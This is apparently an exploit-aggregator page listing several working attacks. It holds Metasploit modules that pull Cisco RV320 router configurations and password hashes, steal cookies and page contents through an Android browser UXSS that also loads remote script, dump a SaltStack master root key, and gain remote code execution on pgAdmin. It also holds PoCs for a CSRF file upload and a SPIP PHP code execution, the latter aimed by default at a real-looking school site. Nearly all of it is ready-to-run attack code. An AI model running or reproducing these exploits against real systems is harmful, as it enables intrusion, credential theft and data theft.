Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco RV320/RV326 Configuration Disclosure', 'Description' => %q{ A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability. }, 'Author' => [ 'RedTeam Pentesting GmbH <release@redteam-pentesting.de>', 'Aaron Soto <asoto@rapid7.com>' ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '46262'], ['BID', '106732'], ['CVE', '2019-1653'], ['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'], ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'], ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html'] ], 'DisclosureDate' => '2019-01-24', 'DefaultOptions' => { 'SSL' => true } )) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']), ]) end def report_cred(user, hash) service_data = { address: rhost, port: rport, service_name: ssl ? 'https' : 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: self.fullname, origin_type: :service, private_data: hash, private_type: :nonreplayable_hash, jtr_format: 'md5', username: user, }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) create_credential_login(login_data) end def parse_config(config) # Report loot to database (and store on filesystem) stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config) print_good("Stored configuration (#{config.length} bytes) to #{stored_path}") # Report host information to database hostname = config.match(/^HOSTNAME=(.*)/)[1] model = config.match(/^MODEL=(.*)/)[1] mac = config.match(/^LANMAC=(.*)/)[1] mac = mac.scan(/\w{2}/).join(':') report_host(host: rhost, mac: mac, name: hostname, os_name: 'Cisco', os_flavor: model) # Report password hashes to database user = config.match(/^user (.*)/)[1] hash = config.match(/^password (.*)/)[1] report_cred(user, hash) end def run begin uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', }, 60) rescue OpenSSL::SSL::SSLError fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.') end if res.nil? fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.') elsif res.code != 200 fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.") end body = res.body if body.match(/####sysconfig####/) parse_config(body) else body.include?"meta http-equiv=refresh content='0; url=/default.htm'" fail_with(Failure::NotVulnerable, 'Response suggests device is patched') end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS', 'Description' => %q{ This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option, which will cause a popup window to be used. This requires a click from the user and is much less stealthy, but is generally harmless-looking. By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this module also allows running arbitrary javascript in the context of the targeted URL. Some sample UXSS scripts are provided in data/exploits/uxss. }, 'Author' => [ 'Rafay Baloch', # Original discovery, disclosure 'joev' # Metasploit module ], 'License' => MSF_LICENSE, 'Actions' => [ [ 'WebServer' ] ], 'PassiveActions' => [ 'WebServer' ], 'References' => [ [ 'URL', 'http://1337day.com/exploit/description/22581' ], [ 'OSVDB', '110664' ], [ 'CVE', '2014-6041' ] ], 'DefaultAction' => 'WebServer' )) register_options([ OptString.new('TARGET_URLS', [ true, "The comma-separated list of URLs to steal.", 'http://example.com' ]), OptString.new('CUSTOM_JS', [ false, "A string of javascript to execute in the context of the target URLs.", '' ]), OptString.new('REMOTE_JS', [ false, "A URL to inject into a script tag in the context of the target URLs.", '' ]), OptBool.new('BYPASS_XFO', [ false, "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.", false ]), OptBool.new('CLOSE_POPUP', [ false, "When BYPASS_XFO is enabled, this closes the popup window after exfiltration.", true ]) ]) end def on_request_uri(cli, request) print_status("Request '#{request.method} #{request.uri}'") if request.method.downcase == 'post' collect_data(request) send_response_html(cli, '') else payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8)) domains = datastore['TARGET_URLS'].split(',') html = <<-EOS <html> <body> <script> var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}")); var bypassXFO = #{datastore['BYPASS_XFO']}; var received = []; window.addEventListener('message', function(e) { var data = JSON.parse(e.data); if (!data.send) { if (bypassXFO && data.i && received[data.i]) return; if (bypassXFO && e.data) received.push(true); } var x = new XMLHttpRequest; x.open('POST', window.location, true); x.send(e.data); }, false); function randomString() { var str = ''; for (var i = 0; i < 5+Math.random()*15; i++) { str += String.fromCharCode('A'.charCodeAt(0) + parseInt(Math.random()*26)) } return str; } function installFrame(target) { var f = document.createElement('iframe'); var n = randomString(); f.setAttribute('name', n); f.setAttribute('src', target); f.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px'); f.onload = function(){ attack(target, n); }; document.body.appendChild(f); } function attack(target, n, i, cachedN) { var exploit = function(){ window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+ 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+ 'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+ '));}void(0);', n); } if (!n) { n = cachedN || randomString(); var closePopup = #{datastore['CLOSE_POPUP']}; var w = window.open(target, n); var deadman = setTimeout(function(){ clearInterval(clear); clearInterval(clear2); attack(targets[i], null, i, n); }, 10000); var clear = setInterval(function(){ if (received[i]) { if (i < targets.length-1) { try{ w.stop(); }catch(e){} try{ w.location='data:text/html,Loading...'; }catch(e){} } clearInterval(clear); clearInterval(clear2); clearTimeout(deadman); if (i < targets.length-1) { setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100); } else { if (closePopup) w.close(); } } }, 50); var clear2 = setInterval(function(){ try { if (w.location.toString()) return; if (w.document) return; } catch(e) {} clearInterval(clear2); clear2 = setInterval(exploit, 50); },20); } else { exploit(); } } var clickedOnce = false; function onclickHandler() { if (clickedOnce) return false; clickedOnce = true; attack(targets[0], null, 0); return false; } window.onload = function(){ if (bypassXFO) { document.querySelector('#click').style.display='block'; window.onclick = onclickHandler; } else { for (var i = 0; i < targets.length; i++) { installFrame(targets[i]); } } } </script> <div style='text-align:center;margin:20px 0;font-size:22px;display:none' id='click' onclick='onclickHandler()'> The page has moved. <a href='#'>Click here to be redirected.</a> </div> </body> </html> EOS print_status("Sending initial HTML ...") send_response_html(cli, html) end end def collect_data(request) response = JSON.parse(request.body) url = response['url'] if response && url file = store_loot("android.client", "text/plain", cli.peerhost, request.body, "aosp_uxss_#{url}", "Data pilfered from uxss") print_good "Collected data from URL: #{url}" print_good "Saved to: #{file}" end end def backend_url proto = (datastore["SSL"] ? "https" : "http") myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}" "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch" end def custom_js rjs_hook + datastore['CUSTOM_JS'] end def rjs_hook remote_js = datastore['REMOTE_JS'] if remote_js.present? "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); " else '' end end def run exploit end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::ZeroMQ include Msf::Auxiliary::Report def initialize(info = {}) super( update_info( info, 'Name' => 'SaltStack Salt Master Server Root Key Disclosure', 'Description' => %q{ This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image. }, 'Author' => [ 'F-Secure', # Discovery 'wvu' # Module ], 'References' => [ ['CVE', '2020-11651'], # Auth bypass (used by this module) ['CVE', '2020-11652'], # Authed directory traversals (not used here) ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'], ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'], ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'], ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py'] ], 'DisclosureDate' => '2020-04-30', # F-Secure advisory 'License' => MSF_LICENSE, 'Actions' => [ ['Dump', { 'Description' => 'Dump root key from Salt master' }] ], 'DefaultAction' => 'Dump', 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'Reliability' => [] } ) ) register_options([ Opt::RPORT(4506) ]) end def run # These are from Msf::Exploit::Remote::ZeroMQ zmq_connect zmq_negotiate unless (root_key = extract_root_key(yeet_prep_auth_info)) print_error('Could not find root key in serialized auth info') # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce return Exploit::CheckCode::Safe end print_good("Root key: #{root_key}") # I hate this API, but store the root key in creds, too create_credential_and_login( workspace_id: myworkspace_id, module_fullname: fullname, origin_type: :service, address: rhost, port: rport, protocol: 'tcp', service_name: 'salt/zeromq', username: 'root', private_data: root_key, private_type: :password ) # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason! rescue EOFError, Rex::ConnectionError => e print_error("#{e.class}: #{e.message}") Exploit::CheckCode::Unknown ensure # This is from Msf::Exploit::Remote::ZeroMQ zmq_disconnect end def yeet_prep_auth_info print_status("Yeeting _prep_auth_info() at #{peer}") zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info')) unless (res = sock.get_once) fail_with(Failure::Unknown, 'Did not receive auth info') end unless res.match(/user.+UserAuthenticationError.+root/m) fail_with(Failure::UnexpectedReply, "Did not receive serialized auth info: #{res.inspect}") end vprint_good('Received serialized auth info') # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack "load" res[4..] end def extract_root_key(auth_info) # Fetch root key from appropriate index of deserialized data, presumably MessagePack.unpack(auth_info)[2]&.fetch('root') rescue EOFError, KeyError, MessagePack::MalformedFormatError => e print_error("#{__method__} failed: #{e.message}") nil end end </code></pre>

<pre><code>============================================================================================================================================= | # Title : Water Billing Management System 1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/wbms_1.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to remotely upload arbitrary files and modify script settings. [+] Line 33 : Set your target url [+] save payload as poc.html [+] payload : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Direct File Upload</title> </head> <body> <h2>Direct File Upload</h2> <form id="uploadForm"> <label for="fileInput">Select File:</label> <input type="file" id="fileInput" name="fileInput" required> <button type="button" onclick="uploadFile()">Upload File</button> </form> <script> function uploadFile() { const fileInput = document.getElementById('fileInput').files[0]; if (!fileInput) { alert('Please select a file.'); return; } const formData = new FormData(); formData.append('name', '<marquee>Hacked by indoushka</marquee>'); formData.append('img', fileInput); console.log("(+) Uploading file..."); fetch('http://127.0.0.1/wbms/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL method: 'POST', body: formData }) .then(response => response.text()) .then(data => { if (data === '1') { console.log("(+) File upload seems to have been successful!"); } else { console.log("(-) Oh no, the file upload seems to have failed!"); } }) .catch(error => console.error("(-) Error during file upload:", error)); } </script> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : SPIP 4.2.6 PHP Code execution Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.spip.net/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Line 49 : Set your target. [+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php [+] Payload : <?php class IndoushkaExploit { private $targetUrl; private $payload; public function __construct($targetUrl, $payload) { $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php'; $this->payload = $this->generatePayload($payload); } private function generatePayload($payload) { // توليد الحمولة مع تضمين الأمر المراد تنفيذه return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]"; } public function exploit() { // إعداد بيانات POST التي سيتم إرسالها إلى الهدف $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]); // تهيئة طلب HTTP باستخدام دالة cURL $ch = curl_init($this->targetUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); // إضافة رؤوس مخصصة لتجاوز المنع curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/x-www-form-urlencoded', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' ]); // تنفيذ الطلب $response = curl_exec($ch); // تحقق من وجود أخطاء في cURL if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch) . "\n"; } else { echo "Exploit Sent! Response:\n"; echo $response; } curl_close($ch); } } // مثال على الاستخدام $targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي $payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها $exploit = new IndoushkaExploit($targetUrl, $payload); $exploit->exploit(); Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'pgAdmin Binary Path API RCE', 'Description' => %q{ pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data. Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated. }, 'License' => MSF_LICENSE, 'Author' => [ 'M.Selim Karahan', # metasploit module 'Mustafa Mutlu', # lab prep. and QA 'Ayoub Mokhtar' # vulnerability discovery and write up ], 'References' => [ [ 'CVE', '2024-3116'], [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'], [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116'] ], 'Platform' => ['windows'], 'Arch' => ARCH_X64, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2024-03-28', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'Reliability' => [ REPEATABLE_SESSION, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] } ) ) register_options( [ Opt::RPORT(8000), OptString.new('USERNAME', [ false, 'User to login with', '']), OptString.new('PASSWORD', [ false, 'Password to login with', '']), OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/']) ] ) end def check version = get_version return CheckCode::Unknown('Unable to determine the target version') unless version return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5') CheckCode::Vulnerable("pgAdmin version #{version} is affected") end def set_csrf_token_from_login_page(res) if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/ @csrf_token = Regexp.last_match(1) # at some point between v7.0 and 7.7 the token format changed elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first) @csrf_token = element['value'] end end def set_csrf_token_from_config(res) if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/ @csrf_token = Regexp.last_match(1) # at some point between v7.0 and 7.7 the token format changed else @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first end end def auth_required? res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true) if res&.code == 302 && res.headers['Location']['login'] true elsif res&.code == 302 && res.headers['Location']['browser'] false end end def on_windows? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true) if res&.code == 200 platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first return platform == 'win32' end end def get_version if auth_required? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) else res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true) end html_document = res&.get_html_document return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4' # there's multiple links in the HTML that expose the version number in the [X]XYYZZ, # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27 versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ } return unless versioned_link Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}") end def csrf_token return @csrf_token if @csrf_token if auth_required? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) set_csrf_token_from_login_page(res) else res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true) set_csrf_token_from_config(res) end fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token @csrf_token end def exploit if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?) fail_with(Failure::BadConfig, 'The application requires authentication, please provide valid credentials') end if auth_required? res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { 'csrf_token' => csrf_token, 'email' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'language' => 'en', 'internal_button' => 'Login' } }) unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login') fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin') end print_status('Successfully authenticated to pgAdmin') end unless on_windows? fail_with(Failure::BadConfig, 'This exploit is specific to Windows targets!') end file_name = 'pg_restore.exe' file_manager_upload_and_trigger(file_name, generate_payload_exe) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end # file manager code is copied from pgadmin_session_deserialization module def file_manager_init res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'dialog_type' => 'storage_dialog', 'supported_types' => ['sql', 'csv', 'json', '*'], 'dialog_title' => 'Storage Manager' }.to_json }) unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir')) fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder') end return trans_id, home_folder end def file_manager_upload_and_trigger(file_path, file_contents) trans_id, home_folder = file_manager_init form = Rex::MIME::Message.new form.add_part( file_contents, 'application/octet-stream', 'binary', "form-data; name=\"newfile\"; filename=\"#{file_path}\"" ) form.add_part('add', nil, nil, 'form-data; name="mode"') form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"') form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{form.bound}", 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => form.to_s }) unless res&.code == 200 && res.get_json_document['success'] == 1 fail_with(Failure::UnexpectedReply, 'Failed to upload file contents') end upload_path = res.get_json_document.dig('data', 'result', 'Name') register_file_for_cleanup(upload_path) print_status("Payload uploaded to: #{upload_path}") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'utility_path' => upload_path[0..upload_path.size - 16] }.to_json }) true end end </code></pre>